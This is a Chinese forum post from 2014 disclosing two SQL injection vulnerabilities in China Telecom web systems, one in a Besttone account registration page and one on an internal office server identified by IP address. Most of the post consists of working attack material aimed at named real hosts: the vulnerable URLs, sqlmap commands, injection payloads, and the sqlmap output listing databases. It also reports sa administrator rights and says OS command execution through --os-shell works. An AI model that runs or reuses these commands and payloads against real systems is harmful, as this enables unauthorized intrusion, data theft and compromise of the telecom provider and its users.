中国电信两处SQL注射下载

来源：黑吧安全网　浏览：644次　时间：2014-07-03

中国电信两处SQL注入漏洞中国电信两处SQL注射(SA权限)

【注射点1 - 号码百事通账户平台】

(这个注射点使用sqlmap似乎只能--dbs读出库名，--tables读不出表名。可惜我不会手工注射 ._. )

http://sso.118114.cn/SSO/registerV2.action 注册"号码百事通"帐号这里的检查用户名是否可用的HTTP请求如下(前几天用了新地址但是原先存在SQL注射的这个页面并没有被删除)

http://customer.besttone.com.cn/UserPortal/PutAuthenCodeForRegisterAllInOne.aspx?PhoneNum=13000000000&SPID=35433333&count=2&typeId=1

其中的SPID参数存在SQL注射。

【注射点2 - 中国电信内部办公网】

在电信官网可以看到 http://www.chntel.com 为内部办公平台

该站点找回密码页面均在 218.30.7.23 这个服务器上。

该服务器上的这个地址存在SQL注射:

http://218.30.7.23/supervise/loginrt.jsp?CertSerial=111

【注射点1】

sqlmap.py -u "http://customer.besttone.com.cn/UserPortal/PutAuthenCodeForRegisterAllInOne.aspx?PhoneNum=13000000000&SPID=35433333&count=2&typeId=1" --dbs --no-cast

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: SPID

    Type: stacked queries

    Title: Microsoft SQL Server/Sybase stacked queries

    Payload: PhoneNum=13000000000&SPID=35433333'; WAITFOR DELAY '0:0:5'--&count=2&typeId=1



    Type: AND/OR time-based blind

    Title: Microsoft SQL Server/Sybase time-based blind

    Payload: PhoneNum=13000000000&SPID=35433333' WAITFOR DELAY '0:0:5'--&count=2&typeId=1

---

web server operating system: Windows 2003

web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727

back-end DBMS: Microsoft SQL Server 2005

available databases [6]:

[*] besttone

[*] cip2

[*] master

[*] model

[*] msdb

[*] tempdb

【注射点2】

sqlmap.py -u "http://218.30.7.23/supervise/loginrt.jsp?CertSerial=111" --dbs --privileges --current-user

该注射点使用sqlmap的--os-cmd或--os-shell均可执行命令。

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: CertSerial

    Type: boolean-based blind

    Title: OR boolean-based blind - WHERE or HAVING clause

    Payload: CertSerial=-5327' OR (6481=6481) AND 'KoFV'='KoFV



    Type: stacked queries

    Title: Microsoft SQL Server/Sybase stacked queries

    Payload: CertSerial=111'; WAITFOR DELAY '0:0:5'--



    Type: AND/OR time-based blind

    Title: Microsoft SQL Server/Sybase time-based blind

    Payload: CertSerial=111' WAITFOR DELAY '0:0:5'--

---

web application technology: JSP

back-end DBMS: Microsoft SQL Server 2000

current user:    'sa'

database management system users privileges:

[*] BUILTIN\Administrators

[*] sa (administrator)



available databases [8]:

[*] master

[*] model

[*] msdb

[*] Northwind

[*] product

[*] pubs

[*] Supervise

[*] tempdb